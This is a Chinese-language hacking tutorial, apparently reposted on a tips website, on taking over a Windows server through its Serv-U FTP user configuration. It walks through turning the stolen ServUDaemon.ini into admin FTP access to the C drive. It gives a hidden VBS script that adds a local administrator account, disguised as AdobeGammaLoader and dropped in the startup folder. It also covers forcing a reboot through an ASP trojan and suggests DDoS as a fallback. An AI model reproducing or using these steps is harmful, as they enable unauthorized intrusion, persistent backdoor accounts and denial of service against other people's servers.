手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >Serv-U 用户的另类盗取
Serv-U 用户的另类盗取
摘要:注:在此之前最好在自己的机器上装一个Serv-U,我们先看看ServUStartUpLog.txtSat01Mar0112:15:24-Se...

注:在此之前最好在自己的机器上装一个Serv-U,

我们先看看ServUStartUpLog.txt

Sat01Mar0112:15:24-Serv-UFTPServerv4.0(4.1.0.0)-Copyright(c)1995-2002Cat

。。。。。。。。。。

版本挺新阿,呵呵

接着看看ServUDaemon.ini(用户配置文件)

哇考,里面的用户真多阿!

接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:

哈哈哈,到次为止大家都知道我的用意了把!

接这ftp上去

哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u)

由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了!

我们先写一个vbs脚本,把这个脚本重命名为AdobeGammaLoader,这样管理员不容易发现!

脚本内容:

setwshshell=createobject("wscript.shell")

a=wshshell.run("cmd.exe/cnetuserallen*****/add",0)

b=wshshell.run("cmd.exe/cnetlocalgroupAdministratorsallen/add",0)

大家都能看懂把,哈哈

然后把他传到DocumentsandSettingsAllUsers「开始」菜单程序启动

呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。

接着用asp木马上传一个shutdown.exe

然后执行shutdown.exe127.0.0.1/r

哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。

不过在ntor2000上普通用户都可以重起机器

还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了!

如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)

【Serv-U 用户的另类盗取】相关文章:

通杀国内一些防火墙技巧

对Serv-U 6.0.0.2默认帐户及密码的一点理解

一个简单的花指令伪装器-Delphi版木马彩衣

COCOON Counter统计程序后台写马

手机短信轰炸(图)

你根本想不到的——IIS另类后门

关于mysql 3.0的注射的一点思路

最近比较流行的数据库挂马

Serv-U.php:黑暗中的光芒

如何寻找自己的UNIX肉鸡(图)

精品推荐
分类导航